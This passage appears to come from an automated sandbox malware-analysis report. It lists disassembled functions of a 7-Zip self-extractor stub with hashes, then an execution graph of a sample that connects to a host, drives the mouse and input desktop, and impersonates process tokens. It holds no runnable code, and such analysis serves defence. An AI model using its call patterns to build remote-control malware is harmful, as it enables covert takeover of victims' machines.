                                                                    • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                    • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                                    Function 0040709B Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                                    • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                                    • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                                    • DeleteObject.GDI32(00000000), ref: 00407126
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                    • String ID:
                                                                    • API String ID: 1900162674-0
                                                                    • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                    • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                                    • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                                    • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                                    Function 00408576 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ScreenToClient.USER32(?,?), ref: 004085B0
                                                                    • GetClientRect.USER32(?,?), ref: 004085C2
                                                                    • PtInRect.USER32(?,?,?), ref: 004085D1
                                                                      • Part of subcall function 00407FD8: KillTimer.USER32(?,00000001,?,004085E6), ref: 00407FE6
                                                                    • CallNextHookEx.USER32(?,?,?), ref: 004085F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                    • String ID:
                                                                    • API String ID: 3015594791-0
                                                                    • Opcode ID: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                    • Instruction ID: e461164be05bcb912302e6f3c507a6476d35c8a33c6b54d2dcb30444e6ba8619
                                                                    • Opcode Fuzzy Hash: 95547b2fb33734e722a1f749a8458f3d385d37bb62c57a358e3a5d7a24cb2da3
                                                                    • Instruction Fuzzy Hash: 53018732110109EBDB15AF65DE44AEA7BA6BB18340B04803EE946A62A1DB34EC01DB49
                                                                    Function 0040411C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                      • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00415778,00415780), ref: 00404168
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00415778,00415780), ref: 00404170
                                                                    • SetWindowTextW.USER32(?,?), ref: 0040417D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404188
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@TextWindow$Length
                                                                    • String ID:
                                                                    • API String ID: 2308334395-0
                                                                    • Opcode ID: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                    • Instruction ID: 4b6459f0461bbe798f755719163b862091937496e8852bb980e1e24ac321b0cc
                                                                    • Opcode Fuzzy Hash: bf2f9251983c8e4603f27720dbecbe6c862c4942a19ddc0db16871e0d016537d
                                                                    • Instruction Fuzzy Hash: 88F0FF72D00108BACF01BBA1DD47CDE7B78AF18349F50406AF515721A1EA359B959B98
                                                                    Function 00407916 Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 00407931
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00407947
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 0040795B
                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 00407967
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFontIndirectItemMessageObjectSend
                                                                    • String ID:
                                                                    • API String ID: 2001801573-0
                                                                    • Opcode ID: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                    • Instruction ID: 7a034716ce128e2868931ba3036e49d2ca07d686104c333d304994eb71a954cf
                                                                    • Opcode Fuzzy Hash: bf1836fc2c99b432ae984c5376e55d25bfda714a933e933cbe8faf723434fd17
                                                                    • Instruction Fuzzy Hash: B4F05476900704EBE7205BA4DD49FCB7BADAB88B01F108135F911F52D4DBB4E4018B69
                                                                    Function 00401D8D Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 00401D92
                                                                    • GetWindowRect.USER32(?,?), ref: 00401DAB
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DB9
                                                                    • ScreenToClient.USER32(00000000,?), ref: 00401DC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ClientScreen$ParentRectWindow
                                                                    • String ID:
                                                                    • API String ID: 2099118873-0
                                                                    • Opcode ID: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                    • Instruction ID: c9a7d6158b24b89f480d793c87918ffc8905022d7cd2aff0562fad3402b16060
                                                                    • Opcode Fuzzy Hash: 373e5a3a3c618f7341f086d59bc570b4278045b0fb2d4c8362c44c34085ab298
                                                                    • Instruction Fuzzy Hash: 6BE08C73604226ABD7109BA6FC88CCBBFADEFD5762700447AF945A2220C7349C109AB5
                                                                    Function 00411F01 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 480COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0041212C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: (nA${D@
                                                                    • API String ID: 613200358-2741945119
                                                                    • Opcode ID: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                    • Instruction ID: 2f127b0a99b440bb22087229e66332d50aa0d3dd2037016e8eed2c3918cb49fd
                                                                    • Opcode Fuzzy Hash: 1e0df42129a71c755aa499faf77b433d37237b934c8390ca0221971e75c2e4af
                                                                    • Instruction Fuzzy Hash: 8C222771900248DFCB24EF65C9909EEBBB5FF08304F50452FE92A97261DB78A995CF48
                                                                    Function 00411C05 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36
                                                                      • Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                      • Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                      • Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$??3@$memmove
                                                                    • String ID: {D@
                                                                    • API String ID: 4294387087-1160549682
                                                                    • Opcode ID: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
                                                                    • Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
                                                                    • Opcode Fuzzy Hash: 006456e1978721f3553438c475323fd4f4958cf9040aa5a49b28c9fd5e78c511
                                                                    • Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94
                                                                    Function 004042EA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: _wtol
                                                                    • String ID: GUIFlags$^L@
                                                                    • API String ID: 2131799477-2609156739
                                                                    • Opcode ID: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                    • Instruction ID: e071545e6e42b97a6ff0e24219ab621184b159c44f090b8d4e9d319f90212361
                                                                    • Opcode Fuzzy Hash: e0faa47fc13e94c2d05b586c97962676ef04bd2d394cb045c4af41830da04771
                                                                    • Instruction Fuzzy Hash: 02F04FB521412386D7342A0995103F7B298EBD47A2FD46437EFC3A21D0C37C4C83926D
                                                                    Function 00407EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@wsprintf
                                                                    • String ID: (%d%s)
                                                                    • API String ID: 3815514257-2087557067
                                                                    • Opcode ID: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                    • Instruction ID: 7ae1222ccb27522ee32bda146f0754d3921d44b98735208d9557fe66e55c1055
                                                                    • Opcode Fuzzy Hash: e9ddc36d7176216f8ad89ff6ca0f705d2026cce2760dcc66f26196aa05fb3aae
                                                                    • Instruction Fuzzy Hash: 2FF09671D00218BFDF21BB55DC46EDEB778EF00308F1081BBB552B15E2DA75AA44CA98
                                                                    Function 004030EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                    • GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: TextWindow$Length
                                                                    • String ID: t1@
                                                                    • API String ID: 1006428111-473456572
                                                                    • Opcode ID: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                    • Instruction ID: 8fdd6815b78bf9020f8e78ba054009a9d995117c016d7113bd8aebbbabd1b082
                                                                    • Opcode Fuzzy Hash: 770e83b9f0c32e4245ab616387d543652a3c08b12fa38d930e4381d9e86358fe
                                                                    • Instruction Fuzzy Hash: 6FE06D3A204612AFC311AF19D84486FBBBAFFD4311B00447AF841D72A1CB34DC158B90
                                                                    Function 00404464 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404472
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: 7-Zip SFX$Could not allocate memory
                                                                    • API String ID: 2030045667-3806377612
                                                                    • Opcode ID: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                    • Instruction ID: 20c12d322158c288d9879b49a54fb0f602392e899c52d42c128a52a7ce83e7b7
                                                                    • Opcode Fuzzy Hash: 8699b6ad29452df4a4c5f53a165df2ad6c674eb36ff819cd2e24d1ff3847e891
                                                                    • Instruction Fuzzy Hash: 79B012703C130C75D50003608C07FC010400B48F03F130412B924E80C1D5E480D0700C

                                                                    Execution Graph

                                                                    Execution Coverage:3%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:10.7%
                                                                    Total number of Nodes:1067
                                                                    Total number of Limit Nodes:36
                                                                    execution_graph 23840 7ff6dc0e9150 89 API calls _RunAllParam 23841 7ff6dc0ed150 177 API calls 3 library calls 23842 7ff6dc0d3d50 12 API calls _getdrive 23843 7ff6dc0ca550 104 API calls _RunAllParam 23845 7ff6dc0d3550 14 API calls _getdrive 23846 7ff6dc0d5550 99 API calls 4 library calls 23848 7ff6dc0c6753 RegCloseKey 23849 7ff6dc0de550 97 API calls 23850 7ff6dc0dd149 96 API calls _RunAllParam 23851 7ff6dc0f6d40 165 API calls 4 library calls 23852 7ff6dc0f5940 109 API calls 23853 7ff6dc0d9740 101 API calls 2 library calls 23854 7ff6dc0e4003 232 API calls 2 library calls 23858 7ff6dc0c3770 111 API calls 2 library calls 23861 7ff6dc0d4970 97 API calls 2 library calls 23862 7ff6dc0d0b70 89 API calls 23863 7ff6dc0cab70 95 API calls _RunAllParam 23272 7ff6dc12cd40 inet_addr 23273 7ff6dc12cd89 gethostbyname 23272->23273 23274 7ff6dc12cdae htons connect 23272->23274 23275 7ff6dc12cda1 23273->23275 23277 7ff6dc12cd97 23273->23277 23274->23275 23276 7ff6dc12cdd5 23274->23276 23279 7ff6dc177220 _getdrive 8 API calls 23275->23279 23281 7ff6dc12cf90 setsockopt 23276->23281 23277->23274 23277->23275 23280 7ff6dc12cded 23279->23280 23282 7ff6dc12cff9 setsockopt 23281->23282 23283 7ff6dc12d08a getsockname getpeername 23281->23283 23284 7ff6dc12d01d 23282->23284 23285 7ff6dc12d022 WSAIoctl 23282->23285 23286 7ff6dc12d109 SetPerTcpConnectionEStats 23283->23286 23287 7ff6dc12d137 23283->23287 23284->23283 23285->23283 23286->23287 23288 7ff6dc177220 _getdrive 8 API calls 23287->23288 23289 7ff6dc12d14e 23288->23289 23289->23275 23864 7ff6dc0d2b5e 87 API calls 23865 7ff6dc0cd560 19 API calls 2 library calls 23866 7ff6dc0d0760 95 API calls free 23868 7ff6dc111550 110 API calls _RunAllParam 23636 7ff6dc0e5958 23637 7ff6dc0e596d 23636->23637 23638 7ff6dc0e5981 23637->23638 23715 7ff6dc0ec2c0 23637->23715 23640 7ff6dc0e597e 23638->23640 23640->23638 23641 7ff6dc0e599d EnterCriticalSection 23640->23641 23756 7ff6dc12d890 97 API calls _RunAllParam 23641->23756 23643 7ff6dc0e59e2 23644 7ff6dc0e7b7e LeaveCriticalSection 23643->23644 23645 7ff6dc0e7afe FlushFileBuffers 23643->23645 23646 7ff6dc0e7b2e 23643->23646 23683 7ff6dc0e4003 23644->23683 23757 7ff6dc12dfc0 CloseHandle 23645->23757 23646->23644 23649 7ff6dc0e7b4e FlushFileBuffers 23646->23649 23758 7ff6dc12dfc0 CloseHandle 23649->23758 23652 7ff6dc0e7c72 23653 7ff6dc0e7c95 23652->23653 23654 7ff6dc0e7c81 Sleep 23652->23654 23655 7ff6dc0e7cf7 23653->23655 23656 7ff6dc0e7ca6 FlushFileBuffers 23653->23656 23654->23653 23658 7ff6dc0e7d59 23655->23658 23659 7ff6dc0e7d08 FlushFileBuffers 23655->23659 23656->23655 23657 7ff6dc0e7ce6 CloseHandle 23656->23657 23657->23655 23760 7ff6dc12a3b0 93 API calls 2 library calls 23658->23760 23659->23658 23660 7ff6dc0e7d48 CloseHandle 23659->23660 23660->23658 23662 7ff6dc0e7d62 23664 7ff6dc0e7d85 23662->23664 23761 7ff6dc0f2170 16 API calls 23662->23761 23665 7ff6dc0e7d9d CloseDesktop 23664->23665 23666 7ff6dc0e7dbc 23664->23666 23665->23666 23669 7ff6dc0e7da7 23665->23669 23673 7ff6dc0c3730 _RunAllParam 89 API calls 23666->23673 23667 7ff6dc0f2220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 23667->23683 23670 7ff6dc0c3730 _RunAllParam 89 API calls 23669->23670 23670->23666 23671 7ff6dc0e31b0 27 API calls 23671->23683 23678 7ff6dc0e7dfc GetModuleFileNameA 23673->23678 23674 7ff6dc0ec590 16 API calls 23674->23683 23675 7ff6dc0e419d GetTickCount 23675->23683 23677 7ff6dc0c3730 _RunAllParam 89 API calls 23680 7ff6dc0e4075 OpenInputDesktop 23677->23680 23681 7ff6dc0e7e15 23678->23681 23682 7ff6dc0e7e56 LoadLibraryA 23678->23682 23679 7ff6dc12d440 16 API calls 23679->23683 23680->23683 23684 7ff6dc0e7c54 23680->23684 23762 7ff6dc17a140 70 API calls 3 library calls 23681->23762 23686 7ff6dc0e7e6b GetProcAddress 23682->23686 23687 7ff6dc0e7e9d 23682->23687 23683->23652 23683->23667 23683->23671 23683->23674 23683->23675 23683->23677 23683->23679 23688 7ff6dc0c3730 89 API calls _RunAllParam 23683->23688 23696 7ff6dc0e7c47 CloseDesktop 23683->23696 23697 7ff6dc12d890 97 API calls 23683->23697 23699 7ff6dc0e40bf CloseDesktop 23683->23699 23705 7ff6dc0e4e2e GetSystemMetrics 23683->23705 23706 7ff6dc0e4eb9 GetSystemMetrics 23683->23706 23709 7ff6dc0e4f76 mouse_event 23683->23709 23710 7ff6dc0e4fd3 GetSystemMetrics GetSystemMetrics GetSystemMetrics GetSystemMetrics 23683->23710 23711 7ff6dc0e50ad GetCursorPos 23683->23711 23752 7ff6dc12a5b0 98 API calls 2 library calls 23683->23752 23753 7ff6dc12a3b0 93 API calls 2 library calls 23683->23753 23754 7ff6dc1295d0 EnterCriticalSection LeaveCriticalSection 23683->23754 23755 7ff6dc0ec6f0 18 API calls _RunAllParam 23683->23755 23759 7ff6dc0ec4e0 93 API calls _RunAllParam 23683->23759 23691 7ff6dc0c3730 _RunAllParam 89 API calls 23684->23691 23690 7ff6dc0e7e8f FreeLibrary 23686->23690 23700 7ff6dc0e7edd 23687->23700 23763 7ff6dc0de580 97 API calls _RunAllParam 23687->23763 23688->23683 23689 7ff6dc0e7e26 23689->23682 23690->23687 23691->23652 23696->23652 23696->23684 23697->23683 23699->23683 23701 7ff6dc0e7fb2 23700->23701 23703 7ff6dc0c3730 _RunAllParam 89 API calls 23700->23703 23702 7ff6dc177220 _getdrive 8 API calls 23701->23702 23704 7ff6dc0e7ff0 23702->23704 23707 7ff6dc0e7f3e 23703->23707 23705->23683 23706->23683 23764 7ff6dc12ab00 95 API calls _RunAllParam 23707->23764 23709->23683 23710->23683 23712 7ff6dc0e50c4 SystemParametersInfoA SystemParametersInfoA SystemParametersInfoA SystemParametersInfoA 23711->23712 23713 7ff6dc0e5128 mouse_event 23711->23713 23712->23713 23713->23683 23714 7ff6dc0e5155 SystemParametersInfoA SystemParametersInfoA 23713->23714 23714->23683 23716 7ff6dc0c3730 _RunAllParam 89 API calls 23715->23716 23717 7ff6dc0ec309 EnterCriticalSection 23716->23717 23719 7ff6dc0ec348 23717->23719 23720 7ff6dc0ec338 LeaveCriticalSection 23717->23720 23722 7ff6dc0ec363 23719->23722 23723 7ff6dc0ec353 LeaveCriticalSection 23719->23723 23721 7ff6dc0ec4b7 23720->23721 23724 7ff6dc177220 _getdrive 8 API calls 23721->23724 23725 7ff6dc0ec37e 23722->23725 23726 7ff6dc0ec36e LeaveCriticalSection 23722->23726 23723->23721 23727 7ff6dc0ec4c7 23724->23727 23728 7ff6dc0c3730 _RunAllParam 89 API calls 23725->23728 23726->23721 23727->23640 23729 7ff6dc0ec393 23728->23729 23765 7ff6dc12a130 73 API calls _getdrive 23729->23765 23731 7ff6dc0ec39a 23732 7ff6dc0ec39e 23731->23732 23733 7ff6dc0ec3cd 23731->23733 23735 7ff6dc0c3730 _RunAllParam 89 API calls 23732->23735 23766 7ff6dc12a0c0 23733->23766 23737 7ff6dc0ec3bc LeaveCriticalSection 23735->23737 23736 7ff6dc0ec3d7 23738 7ff6dc0c3730 _RunAllParam 89 API calls 23736->23738 23737->23721 23739 7ff6dc0ec3f1 23738->23739 23740 7ff6dc0ec4a1 23739->23740 23769 7ff6dc129bc0 LoadLibraryA 23739->23769 23741 7ff6dc0ec4a3 LeaveCriticalSection 23740->23741 23741->23721 23744 7ff6dc0ec413 OpenProcess OpenProcessToken 23746 7ff6dc0ec43d 23744->23746 23747 7ff6dc0ec446 ImpersonateLoggedOnUser 23744->23747 23745 7ff6dc0ec480 23745->23741 23748 7ff6dc0ec491 timeGetTime 23745->23748 23750 7ff6dc0c3730 _RunAllParam 89 API calls 23746->23750 23747->23746 23749 7ff6dc0ec46c CloseHandle CloseHandle 23747->23749 23748->23741 23749->23745 23751 7ff6dc0ec46a 23750->23751 23751->23749 23752->23683 23753->23683 23755->23683 23756->23643 23757->23646 23758->23644 23759->23683 23760->23662 23762->23689 23764->23701 23765->23731 23792 7ff6dc129ef0 23766->23792 23768 7ff6dc12a0d2 23768->23736 23770 7ff6dc129c46 23769->23770 23771 7ff6dc129c11 GetProcAddress GetProcAddress 23769->23771 23773 7ff6dc129c49 GetSystemMetrics 23770->23773 23771->23770 23772 7ff6dc129c40 23771->23772 23772->23773 23774 7ff6dc129c58 23773->23774 23775 7ff6dc129c80 CreateToolhelp32Snapshot 23773->23775 23774->23775 23776 7ff6dc129c61 GetCurrentProcessId ProcessIdToSessionId 23774->23776 23777 7ff6dc129cb7 23775->23777 23778 7ff6dc129c94 Process32First 23775->23778 23776->23775 23780 7ff6dc129cbc FreeLibrary 23777->23780 23781 7ff6dc129cc5 23777->23781 23779 7ff6dc129cae CloseHandle 23778->23779 23783 7ff6dc129cd0 23778->23783 23779->23777 23780->23781 23784 7ff6dc177220 _getdrive 8 API calls 23781->23784 23785 7ff6dc129d5a Process32Next 23783->23785 23787 7ff6dc129cf6 ProcessIdToSessionId 23783->23787 23788 7ff6dc129d0b CloseHandle 23783->23788 23833 7ff6dc179700 23783->23833 23786 7ff6dc0ec40f 23784->23786 23785->23783 23785->23788 23786->23744 23786->23745 23787->23783 23787->23785 23790 7ff6dc129d26 23788->23790 23791 7ff6dc129d1d FreeLibrary 23788->23791 23790->23781 23791->23790 23793 7ff6dc129f28 23792->23793 23794 7ff6dc129fdc 23792->23794 23793->23794 23797 7ff6dc129f30 GetProcessWindowStation 23793->23797 23795 7ff6dc129fec 23794->23795 23796 7ff6dc129f3b 23794->23796 23821 